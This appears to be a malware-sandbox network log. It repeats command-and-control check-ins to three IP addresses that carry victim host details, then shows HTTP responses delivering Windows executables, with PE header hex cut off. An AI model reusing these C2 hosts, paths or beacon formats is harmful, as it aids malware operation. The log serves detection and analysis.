                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Jan 2023 07:58:21 GMTContent-Type: application/octet-streamContent-Length: 240640Last-Modified: Fri, 30 Dec 2022 19:19:36 GMTConnection: keep-aliveETag: "63af39c8-3ac00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 55 a6 4d a0 11 c7 23 f3 11 c7 23 f3 11 c7 23 f3 4a af 20 f2 1b c7 23 f3 4a af 26 f2 8d c7 23 f3 4a af 27 f2 03 c7 23 f3 c4 aa 27 f2 03 c7 23 f3 c4 aa 20 f2 02 c7 23 f3 c4 aa 26 f2 3a c7 23 f3 4a af 22 f2 1e c7 23 f3 11 c7 22 f3 b2 c7 23 f3 8a a9 2a f2 10 c7 23 f3 8a a9 dc f3 10 c7 23 f3 8a a9 21 f2 10 c7 23 f3 52 69 63 68 11 c7 23 f3 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 91 37 af 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ca 02 00 00 0c 01 00 00 00 00 00 b6 75 01 00 00 10 00 00 00 e0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 04 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 6d 03 00 64 00 00 00 00 d0 03 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 03 00 70 28 00 00 c0 3f 03 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 40 03 00 18 00 00 00 30 40 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 e0 02 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dd c9 02 00 00 10 00 00 00 ca 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e0 98 00 00 00 e0 02 00 00 9a 00 00 00 ce 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 44 00 00 00 80 03 00 00 18 00 00 00 68 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 d0 03 00 00 02 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 70 28 00 00 00 e0 03 00 00 2a 00 00 00 82 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Jan 2023 07:58:29 GMTContent-Type: application/octet-streamContent-Length: 129024Last-Modified: Fri, 30 Dec 2022 19:16:17 GMTConnection: keep-aliveETag: "63af3901-1f800"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 9c 01 00 00 58 00 00 00 00 00 00 7c aa 01 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 f0 01 00 4f 00 00 00 00 e0 01 00 26 0e 00 00 00 20 02 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 e0 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 94 9a 01 00 00 10 00 00 00 9c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 b4 13 00 00 00 b0 01 00 00 14 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 e1 09 00 00 00 d0 01 00 00 00 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 26 0e 00 00 00 e0 01 00 00 10 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 4f 00 00 00 00 f0 01 00 00 02 00 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 e0 1d 00 00 00 00 02 00 00 1e 00 00 00 c6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 14 00 00 00 20 02 00 00 14 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 00 00 00 00 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Jan 2023 07:58:29 GMTContent-Type: application/octet-streamContent-Length: 240640Last-Modified: Wed, 04 Jan 2023 21:36:22 GMTConnection: keep-aliveETag: "63b5f156-3ac00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 55 a6 4d a0 11 c7 23 f3 11 c7 23 f3 11 c7 23 f3 4a af 20 f2 1b c7 23 f3 4a af 26 f2 8d c7 23 f3 4a af 27 f2 03 c7 23 f3 c4 aa 27 f2 03 c7 23 f3 c4 aa 20 f2 02 c7 23 f3 c4 aa 26 f2 3a c7 23 f3 4a af 22 f2 1e c7 23 f3 11 c7 22 f3 b2 c7 23 f3 8a a9 2a f2 10 c7 23 f3 8a a9 dc f3 10 c7 23 f3 8a a9 21 f2 10 c7 23 f3 52 69 63 68 11 c7 23 f3 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 56 f1 b5 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ca 02 00 00 0c 01 00 00 00 00 00 b6 75 01 00 00 10 00 00 00 e0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 04 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 